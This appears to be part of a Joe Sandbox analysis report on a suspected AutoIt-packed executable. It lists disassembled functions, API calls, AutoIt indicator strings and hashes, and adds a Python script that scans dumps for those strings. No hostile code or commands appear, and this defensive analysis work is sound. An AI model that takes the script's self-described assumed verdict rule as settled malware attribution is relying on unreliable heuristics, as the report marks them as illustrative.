  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
• _fseek.LIBCMT ref: 00452B3B
• __wsplitpath.LIBCMT ref: 00452B9B
• _wcscpy.LIBCMT ref: 00452BB0
• _wcscat.LIBCMT ref: 00452BC5
• __wsplitpath.LIBCMT ref: 00452BEF
• _wcscat.LIBCMT ref: 00452C07
• _wcscat.LIBCMT ref: 00452C1C
• __fread_nolock.LIBCMT ref: 00452C53
• __fread_nolock.LIBCMT ref: 00452C64
• __fread_nolock.LIBCMT ref: 00452C83
• __fread_nolock.LIBCMT ref: 00452C94
• __fread_nolock.LIBCMT ref: 00452CB5
• __fread_nolock.LIBCMT ref: 00452CC6
• __fread_nolock.LIBCMT ref: 00452CD7
• __fread_nolock.LIBCMT ref: 00452CE8
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
• __fread_nolock.LIBCMT ref: 00452D78
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
• String ID:
• API String ID: 2054058615-0
• Opcode ID: 5ffa14f82790667b1b282f9661ad3f3d24c7149c108a38be8607e6ae2c27b5ff
• Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
• Opcode Fuzzy Hash: 5ffa14f82790667b1b282f9661ad3f3d24c7149c108a38be8607e6ae2c27b5ff
• Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID:
• String ID: >>>AUTOIT SCRIPT<<<$\
• API String ID: 0-1896584978
• Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
• Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
• Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
• Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\x.exe,00000104,?), ref: 00401F4C
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• __wcsicoll.LIBCMT ref: 00402007
• __wcsicoll.LIBCMT ref: 0040201D
• __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
• __wcsicoll.LIBCMT ref: 00402049
• _wcscpy.LIBCMT ref: 0040207C
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\x.exe,00000104), ref: 00428B5B
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\Temp\x.exe$CMDLINE$CMDLINERAW
• API String ID: 3948761352-2477885655
• Opcode ID: b362ff0480f0ff0225f8e4dbf72b30760a6ebb43bcd2e9089b565cca71d3b216
• Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
• Opcode Fuzzy Hash: b362ff0480f0ff0225f8e4dbf72b30760a6ebb43bcd2e9089b565cca71d3b216
• Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __fread_nolock$_fseek_wcscpy
• String ID: D)E$D)E$FILE
• API String ID: 3888824918-361185794
• Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
• Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
• Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
• Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                    • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                                                    • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                                                      • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                                                      • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                    • _wcscat.LIBCMT ref: 00427541
                                                                                                                                                    • _wcslen.LIBCMT ref: 00427551
                                                                                                                                                    • _wcslen.LIBCMT ref: 00427562
                                                                                                                                                    • _wcscat.LIBCMT ref: 0042757C
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                                                    • String ID: Include$\
                                                                                                                                                    • API String ID: 3173733714-3429789819
                                                                                                                                                    • Opcode ID: 97055631afe68ccc8d35a07989050a773b6648bf6af3037baefc2422ebbc3f44
                                                                                                                                                    • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                                                    • Opcode Fuzzy Hash: 97055631afe68ccc8d35a07989050a773b6648bf6af3037baefc2422ebbc3f44
                                                                                                                                                    • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • _fseek.LIBCMT ref: 0045292B
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                                                    • _fseek.LIBCMT ref: 004529BF
                                                                                                                                                    • _malloc.LIBCMT ref: 004529CA
                                                                                                                                                    • _malloc.LIBCMT ref: 004529D6
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                                                    • _free.LIBCMT ref: 00452A17
                                                                                                                                                    • _free.LIBCMT ref: 00452A20
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1255752989-0
                                                                                                                                                    • Opcode ID: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                                                                                                                                    • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                                                                    • Opcode Fuzzy Hash: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                                                                                                                                    • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                    • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                    • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(00A142E0,000000FF,00000000), ref: 00410552
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                                    • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                    • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                                                    • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                    • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                    • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                    • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                    • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                      • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                      • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                      • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                      • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                      • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                      • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                      • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A142E0,000000FF,00000000), ref: 00410552
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                    • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                    • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                                                    • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                    • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
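The two GUI-initialisation functions above (RegisterClassExW with the "AutoIt v3 GUI" class, RegisterWindowMessageW("TaskbarCreated"), InitCommonControlsEx, ImageList_Create) and the earlier include-path resolver that opens HKCU\Software\AutoIt v3\AutoIt together identify the dumped image at 0x400000 as the stock AutoIt v3 interpreter wrapping the payload. The script below is an added triage helper, not Joe Sandbox or AutoIt code: it searches a PE file or memory dump for those indicator strings in both narrow and UTF-16LE form (the runtime calls the W API family, so the literals are normally wide) and reports offsets. The verdict rule and weights are assumptions chosen for illustration; "AU3!EA06" is not in this report and is included as the well-known header of an AutoIt v3 compiled-script resource.

```python
"""
Triage helper: scan a PE image or process memory dump for the AutoIt v3
runtime artefacts referenced in the disassembly listings above.

Added example for this report. Not Joe Sandbox or AutoIt code; the verdict
logic is an assumption made for illustration.
"""
import sys
from dataclasses import dataclass

# Indicator strings taken from the listings (RegOpenKeyExW argument,
# RegisterClassExW class name, RegisterWindowMessageW argument, string IDs).
# "AU3!EA06" is NOT in the report: it is the well-known header of an AutoIt v3
# compiled-script resource, added here as a supplementary indicator.
INDICATORS = {
    "autoit_reg_key": "Software\\AutoIt v3\\AutoIt",
    "autoit_gui_class": "AutoIt v3 GUI",
    "autoit_include_dir": "Include",      # weak alone, reported for context
    "taskbar_created": "TaskbarCreated",  # generic tray-app message, context
    "au3_script_magic": "AU3!EA06",
}

# The interpreter uses the W (UTF-16LE) API family, so its literals are
# normally wide; a narrow copy may still appear in resources or the script.
ENCODINGS = (("ascii", "ascii"), ("utf16le", "utf-16-le"))


@dataclass(frozen=True)
class Hit:
    name: str
    encoding: str
    offset: int  # offset into the scanned buffer; add the dump base for a VA


def find_indicators(data: bytes) -> list:
    """Return every occurrence of every indicator, in both encodings."""
    hits = []
    for name, text in INDICATORS.items():
        for label, codec in ENCODINGS:
            needle = text.encode(codec)
            pos = data.find(needle)
            while pos != -1:
                hits.append(Hit(name, label, pos))
                pos = data.find(needle, pos + 1)
    return hits


def is_autoit_stub(data: bytes) -> bool:
    """Verdict rule (assumption): registry key plus GUI class name together
    identify the interpreter; the script magic alone suffices because only a
    compiled script carries it."""
    names = {h.name for h in find_indicators(data)}
    return "au3_script_magic" in names or (
        "autoit_reg_key" in names and "autoit_gui_class" in names
    )


# Constructed sample, not bytes from the analysed dump: two wide strings as
# the interpreter stores them, plus one narrow string.
CONSTRUCTED_SAMPLE = (
    b"MZ" + b"\x00" * 14
    + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le") + b"\x00\x00"
    + "AutoIt v3 GUI".encode("utf-16-le") + b"\x00\x00"
    + b"TaskbarCreated\x00"
)


def scan_file(path: str) -> bool:
    """Print every hit with its offset and return the verdict."""
    with open(path, "rb") as fh:
        data = fh.read()
    for h in sorted(find_indicators(data), key=lambda h: h.offset):
        print(f"{h.offset:#010x} {h.encoding:8s} {h.name}")
    verdict = is_autoit_stub(data)
    print("verdict:", "AutoIt v3 stub" if verdict else "no AutoIt indicators")
    return verdict


if __name__ == "__main__":
    if len(sys.argv) > 1:
        scan_file(sys.argv[1])
    else:
        for hit in find_indicators(CONSTRUCTED_SAMPLE):
            print(hit)
        print(is_autoit_stub(CONSTRUCTED_SAMPLE))
```

Run it against the dropped executable or against the extracted 0x401000 .sdmp region listed in each Memory Dump Source block; for that region a reported offset maps to VA 0x401000 + offset, which can be checked against the `ref:` addresses above. Absence of the strings in a single region dump does not rule out AutoIt, since the literals may live in a different section than the one dumped.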
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc
                                                                                                                                                    • String ID: Default
                                                                                                                                                    • API String ID: 1579825452-753088835
                                                                                                                                                    • Opcode ID: 1198bc52e153da64d8690da2c80d8544fbc7663c125e93963ee1fcdb872695e3
                                                                                                                                                    • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                                                    • Opcode Fuzzy Hash: 1198bc52e153da64d8690da2c80d8544fbc7663c125e93963ee1fcdb872695e3
                                                                                                                                                    • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                                                                    Control-flow Graph

                                                                                                                                                     • Graph rendering omitted. Basic blocks 0x40F5C0-0x40F6DF with a detour through 0x425D05-0x425D5F; calls into 0x422240, 0x413650, 0x410E60, 0x414D04, 0x4150D1 and 0x414D30.
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                                                    • String ID: AU3!$EA06
                                                                                                                                                    • API String ID: 1268643489-2658333250
                                                                                                                                                    • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                                    • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                                                    • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                                    • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1277 401100-401111 1278 401113-401119 1277->1278 1279 401179-401180 1277->1279 1281 401144-40114a 1278->1281 1282 40111b-40111e 1278->1282 1279->1278 1280 401182 1279->1280 1283 40112c-401141 DefWindowProcW 1280->1283 1285 401184-40118e call 401250 1281->1285 1286 40114c-40114f 1281->1286 1282->1281 1284 401120-401126 1282->1284 1284->1283 1288 42b038-42b03f 1284->1288 1291 401193-40119a 1285->1291 1289 401151-401157 1286->1289 1290 40119d 1286->1290 1288->1283 1296 42b045-42b059 call 401000 call 40e0c0 1288->1296 1294 401219-40121f 1289->1294 1295 40115d 1289->1295 1292 4011a3-4011a9 1290->1292 1293 42afb4-42afc5 call 40f190 1290->1293 1292->1284 1298 4011af 1292->1298 1293->1291 1294->1284 1301 401225-42b06d call 468b0e 1294->1301 1299 401163-401166 1295->1299 1300 42b01d-42b024 1295->1300 1296->1283 1298->1284 1305 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1298->1305 1306 4011db-401202 SetTimer RegisterWindowMessageW 1298->1306 1308 42afe9-42b018 call 40f190 call 401a50 1299->1308 1309 40116c-401172 1299->1309 1300->1283 1307 42b02a-42b033 call 4370f4 1300->1307 1301->1291 1306->1291 1315 401204-401216 CreatePopupMenu 1306->1315 1307->1283 1308->1283 1309->1284 1317 401174-42afde call 45fd57 1309->1317 1317->1283 1328 42afe4 1317->1328 1328->1291
